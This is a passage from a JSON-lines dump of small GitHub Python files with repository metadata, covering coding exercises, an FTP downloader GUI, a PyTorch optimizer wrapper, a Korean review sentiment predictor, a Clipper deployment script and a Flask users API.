wordsOfS[word]=wordsOfS.get(word,0)+1\n \n countOfT=len(t)\n for word in t:\n if wordsOfS.get(word) and wordsOfS[word]!=0:\n wordsOfS[word]-=1\n countOfT-=1\n else:\n return False\n\n if countOfT!=0:\n return False\n return True\n\n# Time complexity -> O(n), n is length of string s\n# Space complexity -> O(s)\n'''\n","repo_name":"ofmukesh/Learning","sub_path":"DailyChallenge/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34384740707","text":"import os\nimport threading\nimport traceback\nfrom tkinter import *\nfrom ftplib import FTP\n\n\nclass DownloadFtp(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.ftp = FTP()\n self.timeout = 30\n self.port = 21\n self.host = '………………'\n self.user = '……'\n self.password = '……'\n\n def ftp_connect(self):\n try:\n self.ftp.connect(self.host, self.port, self.timeout)\n self.ftp.login(self.user, self.password)\n text.insert(END, self.ftp.getwelcome() + '\\n')\n self.ftp.cwd('……/……')\n except:\n traceback.print_exc()\n\n def start_download(self):\n self.ftp_connect()\n ftp_list = self.ftp.nlst()\n for name in ftp_list:\n text.insert(END, u'获得文件:' + name.decode('gb2312') + '\\n')\n if not os.path.exists('py_auto_download/' + name):\n path = 'py_auto_download/' + name\n f = open(path, 'wb')\n filename = 'RETR ' + name\n text.insert(END, u'正在下载:' + name.decode('gb2312') + '\\n')\n self.ftp.retrbinary(filename, f.write)\n else:\n text.insert(END, u'文件或者文件夹已存在,忽略\\n')\n self.ftp.quit()\n\n\ndef button_ftp():\n if not os.path.exists('py_auto_download'):\n os.makedirs('py_auto_download')\n my_ftp = DownloadFtp()\n my_ftp.start()\n my_ftp.start_download()\n\n\ndef button_exec_sql():\n\n pass\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(u'自助操作端升级')\n root.geometry('300x400')\n root.resizable(width=False, height=False)\n text = Text(root)\n text.pack(side=TOP)\n\n frameButton = Frame(root)\n\n frameLButton = Frame(frameButton)\n buttonESQL = Button(frameLButton, 
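The int32-id check in the migration validator above is a plain substring match against the generated SQL, so it is easy to exercise in isolation. A tiny demonstration with a made-up statement:

```python
# Tiny demonstration of the int32-id check from the validator above;
# the SQL statement is a made-up example.
sql = 'CREATE TABLE "posthog_feature" ("id" serial NOT NULL PRIMARY KEY);'
if '"id" serial' in sql:
    print("flagged: new table with an int32 id")  # this branch fires
```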
text=u'升级本地SQL数据库', command=button_exec_sql)\r\n buttonESQL.pack(side=LEFT)\r\n frameLButton.pack(side=LEFT)\r\n\r\n frameRButton = Frame(frameButton)\r\n buttonFTP = Button(frameRButton, text=u'下载自助操作端升级包', command=button_ftp)\r\n buttonFTP.pack(side=RIGHT)\r\n frameRButton.pack(side=RIGHT)\r\n\r\n frameButton.pack()\r\n\r\n root.mainloop()","repo_name":"shasky2014/PythonLearning","sub_path":"test_gui/sadfsadsa.py","file_name":"sadfsadsa.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22398740893","text":"import sys\ninput = sys.stdin.readline\n\nt = int(input().rstrip())\n\narr = []\nresult = 0\nanswers = []\n\nfor i in range(t):\n n = int(input().rstrip())\n \n start = list(input().rstrip())\n goal = list(input().rstrip())\n\n for i in range(n):\n if start[i] != goal[i]:\n arr.append(start[i])\n \n if arr.count(\"B\") >= arr.count(\"W\"):\n result = arr.count(\"B\")\n else:\n result = arr.count(\"W\")\n \n answers.append(result)\n arr = []\n\nfor answer in answers:\n print(answer)","repo_name":"parksangmyeong1/Algorithm","sub_path":"Python/브루트포스/[BOJ]오셀로 재배치.py","file_name":"[BOJ]오셀로 재배치.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16582998545","text":"from qt import *\r\nfrom urldialog import UrlDialog\r\n\r\n\r\nclass UrlDialog_Impl(UrlDialog):\r\n\r\n\r\n targetList = {}\r\n\r\n def __init__(self,parent = None,name = None,modal = 0,fl = 0):\r\n UrlDialog.__init__(self,parent,name,modal,fl)\r\n # Hide these two until we've figured out how\r\n # to deal with them\r\n self.comboClass.hide()\r\n self.labelClass.hide()\r\n \r\n self.editUrl.setFocus()\r\n self.targetList['in new window'] = '_blank'\r\n self.targetList['in same window'] = '_top'\r\n self.targetList['in same frame'] = '_self'\r\n for key in self.targetList.keys():\r\n self.comboOpen.insertItem(key)\r\n\r\n def initValues(self, text):\r\n if text:\r\n self.editName.setText(text)\r\n\r\n def urltag(self):\r\n urltag = ''\r\n\r\n\r\ndef longestCommonPrefix(string_list) -> str:\r\n if len(string_list) == 0:#check for empty\r\n return \"\"#If empty return quotes\r\n \r\n length = [len(str) for str in string_list]#use a list comprehension to take the length of each string in the list\r\n max_length = max(length)\r\n result = \"\"\r\n \r\n for i in range(1, max_length+1):#for item in the range of strings we have\r\n common_string = string_list[0][:i]#assign the common portion of the string from initial character to the iterator\r\n for s in string_list:#iterate through the string list\r\n if s[:i] != common_string:#Check to what degree they are in common up to the iterator\r\n return result\r\n result = common_string\r\n return result\r\n","repo_name":"TheNomadicPyre/LeetCode-Solutions","sub_path":"Longest common Prefix.py","file_name":"Longest common Prefix.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"21242500986","text":"import numpy as np\r\nfrom torch import optim\r\n\r\ndef get_optimizer(config, model):\r\n optimizer = base_optimizer(config, model)\r\n return optimizer\r\n\r\nclass base_optimizer(object):\r\n def __init__(self, config, model):\r\n super(base_optimizer, self).__init__()\r\n\r\n # optimizer\r\n if config.optimizer == 'Adam':\r\n self.optimizer = optim.Adam(model.parameters(), lr=config.lr)\r\n elif config.optimizer == 'Adadelta':\r\n self.optimizer = optim.Adadelta(model.parameters(), lr=config.lr)\r\n else:\r\n 
raise ValueError('unsupported optimizer')\r\n\r\n # scheduler\r\n if config.scheduler == 'ReduceLROnPlateau':\r\n from torch.optim.lr_scheduler import ReduceLROnPlateau\r\n self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', verbose=True)\r\n elif config.scheduler == 'StepLR':\r\n from torch.optim.lr_scheduler import StepLR\r\n self.scheduler = StepLR(self.optimizer, 100, gamma=0.1, last_epoch=-1)\r\n else:\r\n self.scheduler = None\r\n\r\n def update_model(self, loss):\r\n self.optimizer.zero_grad()\r\n\r\n if np.isnan(loss.item()):\r\n print('\\n\\n\\nERROR::: THE LOSS IS NAN\\n\\n\\n')\r\n raise ValueError('the loss is NaN')\r\n else:\r\n loss.backward()\r\n self.optimizer.step()\r\n return None\r\n\r\n def scheduler_step(self, metric):\r\n if self.scheduler is not None:\r\n self.scheduler.step(metric)\r\n return None","repo_name":"seharanul17/interactive_keypoint_estimation","sub_path":"misc/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
{"seq_id":"8797347729","text":"import sys\nsys.setrecursionlimit(100000000)\nN = int(input())\nG = [[] for _ in range(N)]\nfor _ in range(N-1):\n a,b = map(int,input().split())\n a -= 1\n b -= 1\n G[a].append(b)\n G[b].append(a)\nV = [0]*N\ndef dfs(i,vi):\n res = 1\n for ni in G[i]:\n if ni == vi:\n continue\n res += dfs(ni,i)\n V[i] = res\n return res\ndfs(0,0)\nans = 0\ndef dfs1(i,vi):\n global ans\n ans += (N-V[i])*V[i]\n for ni in G[i]:\n if ni == vi:\n continue\n dfs1(ni,i)\ndfs1(0,0)\nprint(ans)","repo_name":"shimamura10/Atcoder","sub_path":"典型90/39_2.py","file_name":"39_2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10480865397","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n def getPath(cur_n, target):\n if cur_n == target:\n return [target]\n left = []\n if cur_n.left:\n left = getPath(cur_n.left, target)\n right = []\n if cur_n.right:\n right = getPath(cur_n.right, target)\n \n if not left and not right:\n return []\n \n return [cur_n] + left if left else [cur_n] + right \n\n p_path = getPath(root, p)\n q_path = getPath(root, q)\n\n i = 0\n while i < len(p_path) and i < len(q_path) and p_path[i] == q_path[i]:\n i += 1\n\n return p_path[i - 1]","repo_name":"Iliaromanov/Algos-and-DataStructs-Practice","sub_path":"Top_Interview_Questions/lowestCommonAncestor.py","file_name":"lowestCommonAncestor.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"71594992809","text":"'''\nUsage: Transcribing_DNA_into_RNA.py data.txt\n'''\n\nimport sys\n\n\ndatafile = sys.argv[1]\n\nwith open(datafile, \"r\") as data:\n data = \"\".join(data.readlines())\n data_items = data\n\n\n# data_items = \"GATGGAACTTGACTACGTAAATT\"\n\n\n# for i in data_items:\n # i = i.replace(\"T\", \"U\")\nnewdata = data_items.replace(\"T\", \"U\")\nprint(newdata)\n\nwith open(\"output_file.txt\", \"w\") as output_file:\n # output_file.write(newdata)\n print(newdata, file=output_file)\n","repo_name":"cansakirt/python_scripts","sub_path":"Rosalind.info/2 - Transcribing DNA into 
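The optimizer wrapper above hides the zero_grad/backward/step sequence behind `update_model` and makes the scheduler optional. A hypothetical usage sketch; the config stub and toy model are illustrative, not from the repository:

```python
# Hypothetical usage of the optimizer wrapper defined above; the config
# stub and the toy model are placeholders.
import torch
from types import SimpleNamespace

config = SimpleNamespace(optimizer="Adam", lr=1e-3, scheduler=None)
model = torch.nn.Linear(4, 1)

opt = get_optimizer(config, model)        # wraps Adam, no scheduler
x, y = torch.randn(8, 4), torch.randn(8, 1)
loss = torch.nn.functional.mse_loss(model(x), y)
opt.update_model(loss)                    # zero_grad -> backward -> step
opt.scheduler_step(loss.item())           # no-op when scheduler is None
```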
RNA/Transcribing_DNA_into_RNA.py","file_name":"Transcribing_DNA_into_RNA.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4766258992","text":"import joblib, re\nfrom konlpy.tag import Okt as okt\nimport konlpy\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\n#from NaverMovie import execute\nfrom functools import reduce\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nfrom collections import Counter as counter\n#from kakaoMessage import execute_msg\n\n# Movie review prediction -> 0 : negative / 1 : positive\n# Without this method the vectorizer file cannot be loaded! \n# In Django this has to be placed in manage.py!\ndef divide_morphs(txt):\n nlp = okt()\n return nlp.morphs(txt)\n\ndef pre_ready(text, tfidfVec):\n temp = text\n temp = re.compile(r'[ㄱ-ㅣ가-힣]+').findall(temp)\n temp = [' '.join(temp)]\n return tfidfVec.transform(temp)\n\ndef draw_wc(worddict):\n font_path = './resources/font/ibmplexsanskr_regular.ttf'\n wc = WordCloud(font_path, background_color='beige', width=700, height=500)\n c = wc.generate_from_frequencies(worddict)\n c.to_file('./static/img/result_wordcloud.jpg')\n #plt.figure(figsize=(8, 8))\n #plt.imshow(c)\n #plt.axis('off')\n #plt.show()\n\ndef entire_predict(ratingStar, result_data):\n # gridSearch version : load the pre-trained model and vectorizer.\n model = joblib.load('./resources/model/rand/best_review_classifier.pkl')\n tfidfVec = joblib.load('./resources/model/rand/tfidfVectorizer_rand.pkl')\n\n # Search by movie title, pick the desired movie, then fetch as many review entries as needed from it.\n #ratingStar, result_data = execute()\n result_data = result_data[1][1:]\n\n print('\\n\\n분석이 끝날 때까지 잠시만 기다려주세요......')\n pos = []\n neg = []\n posCount = 0\n negCount = 0\n entire = len(result_data)\n\n for i in result_data:\n ready = pre_ready(i, tfidfVec)\n res = model.predict(ready)\n if res == 0: # 0 means negative\n neg.append(i)\n negCount += 1\n else:\n pos.append(i)\n posCount += 1\n\n collect = ''\n tree = ''\n resStr = ''\n print('='*50, '결과', '='*50, end='\\n\\n')\n plt.figure(figsize=(8, 8))\n posPercent = (posCount/entire) * 100\n tree = '긍정적인 의견 : {}% / 부정적인 의견 : {}%'.format(posPercent, 100-posPercent)\n print(tree)\n if 0 <= posPercent < 25:\n resStr += '노잼!\\n으헝헝 노잼! 이걸 보느니 차라리 아무것도 안하고 말지...!!!!'\n #render = img.imread('./resources/imgs/jo.jpg')\n elif 25 <= posPercent < 75:\n resStr += '볼까? 말까?\\n'\n #render = img.imread('./resources/imgs/gomin.png')\n if 25 <= posPercent < 50:\n resStr += '관람객의 의견은 {} 부정적인 편입니다.....'.format('대체로' if 25 <= posPercent < 35 else '')\n else:\n resStr += '관람객의 의견은 {} 긍정적인 편입니다~'.format('대체로' if 65 <= posPercent < 75 else '')\n elif 75<= posPercent <= 100:\n #render = img.imread('./resources/imgs/wow.jpg')\n resStr += '어머! 이건 꼭 사야 해!\n꼭 보세요! 
무조건 보세요!'\n print(resStr)\n # plt.imshow(render)\n #plt.axis('off')\n #plt.show()\n #print('\\n')\n collect += resStr + '\\n\\n' + tree + '\\n\\n' \n\n if 0 <= posPercent < 50:\n longline = reduce(lambda x, y : x + ' ' + y, neg)\n else:\n longline = reduce(lambda x, y : x + ' ' + y, pos)\n longline = re.sub('[^가-힣ㄱ-ㅎㅏ-ㅣ]', ' ', longline)\n nlp = okt()\n nouns = nlp.nouns(longline)\n\n vcount = counter(nouns)\n worddict = dict()\n mc100 = vcount.most_common(100)\n for group in mc100:\n if group[1] > 2:\n worddict[group[0]] = group[1]\n\n starStr = ''\n #print('These are the ratings from viewers of this movie.')\n for star in ratingStar: starStr += star\n #print('These are the words that appear most often in the reviews.')\n print(starStr)\n draw_wc(worddict)\n collect += starStr\n return [posCount, posPercent, ratingStar, collect]\n","repo_name":"Daniel-David-Kim/How_about_this_movie","sub_path":"Personal/nmovie/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5872747454","text":"print(\"****Garbage Collection*****\")\r\n#How to enable and disable the Garbage Collector in our program:\r\n\"\"\"1) gc.isenabled() -> Returns True if GC is enabled\r\n 2) gc.disable() To disable GC explicitly\r\n 3) gc.enable() To enable GC explicitly \"\"\"\r\n\r\nimport gc\r\nprint(gc.isenabled())\r\ngc.disable()\r\nprint(gc.isenabled())\r\ngc.enable()\r\nprint(gc.isenabled())\r\n\r\nprint(\"*****Destructors*****\")\r\n\"\"\"Destructor is a special method and the name should be __del__\r\n--> Just before destroying an object, the Garbage Collector always calls the destructor to perform\r\nclean up activities (resource deallocation activities like closing database connections etc).\r\n--->Once destructor execution is completed, the Garbage Collector automatically destroys\r\nthat object. 
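The `entire_predict` routine above scores each scraped review by stripping everything but Hangul, joining the tokens, and passing the TF-IDF vector to the persisted classifier. A minimal sketch of scoring a single review the same way; the sample text is a placeholder, and it assumes the pickled artifacts referenced in the record exist on disk:

```python
# Sketch of scoring one review with the persisted artifacts used above;
# the sample text is a placeholder.
import joblib, re

model = joblib.load('./resources/model/rand/best_review_classifier.pkl')
tfidfVec = joblib.load('./resources/model/rand/tfidfVectorizer_rand.pkl')

text = '정말 재미있는 영화였어요'
tokens = re.compile(r'[ㄱ-ㅣ가-힣]+').findall(text)   # same cleanup as pre_ready
vec = tfidfVec.transform([' '.join(tokens)])
print('positive' if model.predict(vec)[0] == 1 else 'negative')
```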
\"\"\"\r\n\r\nimport time\r\nclass Test:\r\n def __init__(self):\r\n print(\"Object Initialization...\")\r\n def __del__(self):\r\n print(\"Fulfilling Last Wish and performing clean up activities...\")\r\nt1=Test()\r\nt1=None\r\ntime.sleep(5)\r\nprint(\"End of application\")\r\n\r\n\r\nprint(\"****find the Number of References of an Object****\")\r\n\"\"\"sys module contains getrefcount() function for this purpose.\r\nsys.getrefcount (objectreference) \"\"\"\r\nimport sys\r\nclass Sample:\r\n pass\r\ns1=Sample()\r\ns2=s1\r\ns3=s1\r\ns4=s1\r\ns5=s1\r\nprint(sys.getrefcount(s1))\r\n","repo_name":"VenkyGajula/Python_Advance_OOPS","sub_path":"GBC.py","file_name":"GBC.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6392692130","text":"import datetime\n\nfrom bot.data.schedule.couple_constants import FIRTS_START, SECOND_START, THIRD_START, FOURTH_START, FIFTH_START\nfrom bot.data.schedule.couple_constants import FIRST_END, SECOND_END, THIRD_END, FOURTH_END, FIFTH_END\n\n\ndef event_remains(number_of_couple: int, event_status: str) -> str:\n \"\"\"Считает, сколько оcталось до конца соответствующей пары или перемны\"\"\"\n\n if event_status == 'lesson':\n event = {0: FIRST_END, 1: SECOND_END, 2: THIRD_END, 3: FOURTH_END, 4: FIFTH_END}\n else:\n event = {0: FIRTS_START, 1: SECOND_START, 2: THIRD_START, 3: FOURTH_START, 4: FIFTH_START}\n\n now = datetime.datetime.now()\n\n delta = str(datetime.datetime.combine(datetime.datetime.today(), event[number_of_couple]) - now)\n\n return delta[:-7]\n","repo_name":"daniilolider/lupen","sub_path":"bot/modules/schedule/event_remains.py","file_name":"event_remains.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30837160601","text":"import re\r\nimport time\r\n\r\n\r\nclass DatePipeline:\r\n def process_item(self, item, spider):\r\n date = item['confrontation_date']\r\n date = self.trunc_day_name(date)\r\n date = self.replace_month_name_by_number(date)\r\n date = self.get_time_object(date)\r\n item['confrontation_date'] = date\r\n return item\r\n\r\n def trunc_day_name(self, date):\r\n pattern = r\"(\\d.*)$\"\r\n match = re.search(pattern, date)\r\n return match.group(0)\r\n\r\n def replace_month_name_by_number(self, date):\r\n months = {\r\n 'janvier': '01',\r\n 'février': '02',\r\n 'mars': '03',\r\n 'avril': '04',\r\n 'mai': '05',\r\n 'juin': '06',\r\n 'juillet': '07',\r\n 'août': '08',\r\n 'septembre': '09',\r\n 'octobre': '10',\r\n 'novembre': '11',\r\n 'décembre': '12',\r\n }\r\n\r\n for month_name, month_number in months.items():\r\n date = date.replace(month_name, month_number)\r\n \r\n return date\r\n\r\n def get_time_object(self, date):\r\n if re.search(r'^\\d+\\s+\\d+\\s+\\d+$', date):\r\n # sometimes, the hour is not indicated\r\n return time.strptime(date, \"%d %m %Y\")\r\n return time.strptime(date, \"%d %m %Y - %HH%M\")","repo_name":"Surkal/FFF-data-extractor","sub_path":"extractor/extractor/pipelines/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3082267881","text":"import torch\nimport torchvision\nimport numpy as np\nimport os\nimport io\nimport base64\nimport requests\nimport json\nimport time\nimport pyarrow as pa\nfrom PIL import Image\nfrom torchvision import transforms\nfrom clipper_admin import 
ClipperConnection, DockerContainerManager\nimport clipper_admin.deployers.pytorch as pytorch_deployer\nfrom clipper_admin.deployers import python as python_deployer\nfrom clipper_admin.deployers.python import deploy_python_closure\n\n\nincept = torchvision.models.inception_v3(pretrained=True)\ntransform_pipeline = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize(299),\n transforms.CenterCrop(299),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\ndef incept_predict(model, inputs):\n model.eval()\n x = [pa.deserialize(i) for i in inputs]\n input_tensor = torch.cat([transform_pipeline(i[0]).unsqueeze(0) for i in x])\n \n \n with torch.no_grad():\n out = model(input_tensor)\n \n _, indices = torch.sort(out, descending=True)\n percentage = torch.nn.functional.softmax(out, dim=1)\n p_2 = percentage.detach().numpy()\n return [[indices.data.numpy()[idx][0].item(), p_2[idx][indices[idx][0]].item()*100] for idx in range(len(inputs))]\n\n\n\ndef setup_clipper():\n app_name = 'inceptionv3-app'\n model_name = 'inceptionv3-model'\n clipper_conn = ClipperConnection(DockerContainerManager())\n clipper_conn.connect()\n\n pytorch_deployer.deploy_pytorch_model(clipper_conn=clipper_conn,\n name=model_name,\n version='1',\n input_type='bytes',\n func=incept_predict,\n pytorch_model=incept,\n num_replicas=10,\n batch_size = 1,\n pkgs_to_install=['pillow','pyarrow', 'torch', 'torchvision'])\n\n clipper_conn.register_application(name=app_name,\n input_type=\"bytes\",\n default_output=\"-1.0\",\n slo_micros=10000000) # 10s\n\n clipper_conn.link_model_to_app(app_name=app_name, model_name=model_name)\n\n\n print(\"url: \", \"http://{addr}/{app_name}/predict\".format(addr=\"\",app_name=app_name))\n\n\nsetup_clipper()","repo_name":"hsubbaraj/clipper_bench","sub_path":"incept_setup.py","file_name":"incept_setup.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20383328328","text":"# -- DICTIONARIES --\n# Connect pieces of related info\n# dictionaries == objects == hashes\n\nalien_0 = {'color': 'green', 'planet': 'zion'}\n# print(alien_0['color']) //=> green\n\n# Keys are kept in the same order they're added\nalien_0['x_pos'] = 0\nalien_0['y_pos'] = 25\n\n# Overwriting values\nalien_0['color'] = 'purple'\n\n# Delete key/value\ndel alien_0['planet']\n\n# Get method\n# Optional - set default return, or returns NONE\n# DOESN'T SET DEFAULT VALUE!!\n# print(alien_0.get('name', 'Blinky'))\n\n# -- Looping through dictionaries --\n# \t1) for key, value in alien_0\n# \t2) for key in alien_0.keys()\n# \t3) for key in alien_0 - Same as above!\n# \t4) for value in alien_0.values()\n\n# set() makes list unique!\n\nlist_of_ranges = []\nfor value in range(6):\n\tnew_dict = {'range': value}\n\tlist_of_ranges.append(new_dict)\n# print(list_of_ranges[3]['range']) // => 3\n\n\n# -- Nested data structures --\ncomplex_dict = {\n\t'first': {\n\t\t'name': 'Christian',\n\t\t'age': 25,\n\t\t'hobbies': ['cooking', 'skating', 'hiking']\n\t}\n}\n\n# print(complex_dict['first']['hobbies'][2]) // => 'hiking'","repo_name":"SenseiCain/python_crash_course","sub_path":"syntax/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7829332469","text":"import json\r\n\r\n\r\nclass RequestAssembler:\r\n '''\r\n Request assembler\r\n 
'''\r\n\r\n @staticmethod\r\n def assembleConnectRequest():\r\n request = dict()\r\n request['head'] = 'connectRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleGetFileListFromServerRequest():\r\n request = dict()\r\n request['head'] = 'getFileListFromServerRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleNewFileRequest(fileName, content):\r\n request = dict()\r\n request['head'] = 'newFileRequest'\r\n request['fileName'] = fileName\r\n request['content'] = content\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleJoinNetworkRequest(nodeId, nodeIp, nodePort):\r\n request = dict()\r\n request['head'] = 'joinNetworkRequest'\r\n request['nodeId'] = nodeId\r\n request['nodeIp'] = nodeIp\r\n request['nodePort'] = nodePort\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleAddFileRequest(fileName, content, forward):\r\n request = dict()\r\n request['head'] = 'addFileRequest'\r\n request['fileName'] = fileName\r\n request['content'] = content\r\n request['forward'] = forward\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleReadFileRequest(fileName):\r\n request = dict()\r\n request['head'] = 'readFileRequest'\r\n request['fileName'] = fileName\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleGetFileListFromNodeRequest():\r\n request = dict()\r\n request['head'] = 'getFileListFromNodeRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleCloneNodeRequest():\r\n request = dict()\r\n request['head'] = 'cloneNodeRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleCopyServerRequest(nodeList, fileList, backupServerList):\r\n request = dict()\r\n request['head'] = 'copyServerRequest'\r\n request['nodeList'] = nodeList\r\n request['fileList'] = fileList\r\n request['backupServerList'] = backupServerList\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleCloneServerRequest(serverId):\r\n request = dict()\r\n request['head'] = 'cloneServerRequest'\r\n request['serverId'] = serverId\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleJoinBackupListRequest(serverId, serverIp, serverPort):\r\n request = dict()\r\n request['head'] = 'joinBackupListRequest'\r\n request['serverId'] = serverId\r\n request['serverIp'] = serverIp\r\n request['serverPort'] = serverPort\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleGetBackupServerRequest():\r\n request = dict()\r\n request['head'] = 'getBackupServerRequest'\r\n return json.dumps(request)\r\n\r\n @staticmethod\r\n def assembleStorageNodeRemoveRequest(nodeId):\r\n request = dict()\r\n request['head'] = 'storageNodeRemoveRequest'\r\n request['nodeId'] = nodeId\r\n return json.dumps(request)\r\n","repo_name":"Zhuolun1996/CS2510Project2","sub_path":"MessageAssembler/RequestAssembler.py","file_name":"RequestAssembler.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44116958918","text":"#!/usr/bin/python3\n\"\"\"API Routes for Users.\n\nThis module defines the API routes for handling users in the Flask app.\nIt includes route handlers for retrieving all users,\nretrieving a specific user by ID, creating a new user,\nupdating an existing user, and deleting a user.\n\nRoutes:\n- GET /users: Retrieve all users.\n- GET /users/: Retrieve a specific user by ID.\n- DELETE /users/: Delete a user.\n- POST /users/: Create a new user.\n- PUT 
/users/: Update an existing user.\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, request\nfrom models import storage\nfrom models.engine.db_storage import classes\n\n\n@app_views.route(\"/users\", strict_slashes=False, methods=[\"GET\"])\ndef get_users():\n \"\"\"Retrieve all users.\n\n Returns:\n A JSON response containing a list of all users.\n \"\"\"\n users = storage.all(\"User\")\n users_list = []\n for user in users.values():\n users_list.append(user.to_dict())\n return jsonify(users_list)\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"GET\"])\ndef get_user(user_id):\n \"\"\"Retrieve a specific user by ID.\n\n Args:\n user_id: The ID of the user to retrieve.\n\n Returns:\n A JSON response containing the details of the specified user.\n\n Raises:\n 404: If the user with the specified ID does not exist.\n \"\"\"\n user = storage.get(classes[\"User\"], user_id)\n if user is None:\n abort(404)\n return jsonify(user.to_dict())\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"DELETE\"])\ndef delete_user(user_id):\n \"\"\"Delete a user.\n\n Args:\n user_id: The ID of the user to delete.\n\n Returns:\n An empty JSON response.\n\n Raises:\n 404: If the user with the specified ID does not exist.\n \"\"\"\n user = storage.get(classes[\"User\"], user_id)\n if user is None:\n abort(404)\n storage.delete(user)\n storage.save()\n return jsonify({})\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"POST\"])\ndef post_user():\n \"\"\"Create a new user.\n\n Returns:\n A JSON response containing the details of the newly created user.\n\n Raises:\n 400: If the request data is not a valid JSON\n or if the 'email' or 'password' field is missing.\n \"\"\"\n user_data = request.get_json(force=True, silent=True)\n if type(user_data) is not dict:\n abort(400, \"Not a JSON\")\n\n if \"email\" not in user_data:\n abort(400, \"Missing email\")\n\n if \"password\" not in user_data:\n abort(400, \"Missing password\")\n else:\n new_user = classes[\"User\"](**user_data)\n storage.new(new_user)\n storage.save()\n return jsonify(new_user.to_dict()), 201\n\n\n@app_views.route(\"/users/\", strict_slashes=False, methods=[\"PUT\"])\ndef put_user(user_id):\n \"\"\"Update an existing user.\n\n Args:\n user_id: The ID of the user to update.\n\n Returns:\n A JSON response containing the updated details of the user.\n\n Raises:\n 404: If the user with the specified ID does not exist.\n 400: If the request data is not a valid JSON.\n \"\"\"\n user = storage.get(classes[\"User\"], user_id)\n if user is None:\n abort(404)\n\n user_data = request.get_json(force=True, silent=True)\n if type(user_data) is not dict:\n abort(400, \"Not a JSON\")\n\n for key, value in user_data.items():\n if key in [\"id\", \"email\", \"created_at\", \"updated_at\"]:\n continue\n setattr(user, key, value)\n\n storage.save()\n return jsonify(user.to_dict())\n","repo_name":"PeterDalatu/AirBnB_clone_v3","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2449238253","text":"from random import randint\r\nfrom time import sleep\r\n\r\nn1 = randint(0,5)\r\n\r\nprint('O computador pensou em um número de 0 a 5.')\r\nn2 = int(input('Adivinhe qual é o número: '))\r\nprint('.')\r\nsleep(1)\r\nprint('.')\r\nsleep(1)\r\nprint('.')\r\nsleep(1)\r\n\r\nif n2 == n1:\r\n print('Você acertou! 
{}'.format(n1))\r\nelse:\r\n print('Errou. Resposta: {}'.format(n1))","repo_name":"jvjzn/PythonExercicios","sub_path":"ex031-adivinha.py","file_name":"ex031-adivinha.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
